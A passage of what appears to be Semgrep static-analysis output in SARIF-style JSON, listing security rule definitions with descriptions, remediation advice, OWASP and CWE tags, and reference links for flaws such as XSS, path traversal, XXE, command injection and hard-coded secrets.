[https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","id":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","name":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","id":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","name":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","id":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","name":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask","id":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","name":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-shelve-flask.tainted-shelve-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","id":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","name":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"help":{"markdown":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path)\n - [https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/](https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/)\n","text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","id":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","name":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"help":{"markdown":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions](https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions)\n","text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","id":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","name":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"helpUri":"https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","id":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","name":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.nosql-injection-servlets.nosql-injection-servlets"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","id":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","name":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"help":{"markdown":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag)\n - [https://www.php.net/manual/en/language.basic-syntax.phptags.php](https://www.php.net/manual/en/language.basic-syntax.phptags.php)\n","text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","id":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","name":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"help":{"markdown":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization)\n - [https://github.com/mgholam/fastJSON#security-warning-update](https://github.com/mgholam/fastJSON#security-warning-update)\n","text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","id":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","name":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"help":{"markdown":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2)\n","text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2","id":"python.lang.compatibility.python37.python37-compatibility-importlib2","name":"python.lang.compatibility.python37.python37-compatibility-importlib2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-importlib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSL verification disabled, this allows for MitM attacks"},"help":{"markdown":"SSL verification disabled, this allows for MitM attacks\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none)\n - [https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify](https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify)\n","text":"SSL verification disabled, this allows for MitM attacks"},"helpUri":"https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none","id":"rust.lang.security.ssl-verify-none.ssl-verify-none","name":"rust.lang.security.ssl-verify-none.ssl-verify-none","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.ssl-verify-none.ssl-verify-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The code must not contain any of Unicode Direction Control Characters"},"help":{"markdown":"The code must not contain any of Unicode Direction Control Characters\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters)\n - [https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo](https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo)\n","text":"The code must not contain any of Unicode Direction Control Characters"},"helpUri":"https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters","id":"solidity.security.no-bidi-characters.no-bidi-characters","name":"solidity.security.no-bidi-characters.no-bidi-characters","properties":{"precision":"very-high","tags":["CWE-837: Improper Enforcement of a Single, Unique Action","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.no-bidi-characters.no-bidi-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","id":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","name":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","id":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","name":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"help":{"markdown":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal)\n - [https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af](https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af)\n - [https://www.acunetix.com/websitesecurity/php-security-2/](https://www.acunetix.com/websitesecurity/php-security-2/)\n","text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal","id":"php.lang.security.tainted-path-traversal.tainted-path-traversal","name":"php.lang.security.tainted-path-traversal.tainted-path-traversal","properties":{"precision":"very-high","tags":["CWE-23: Relative Path Traversal","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-path-traversal.tainted-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"help":{"markdown":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms)\n","text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = 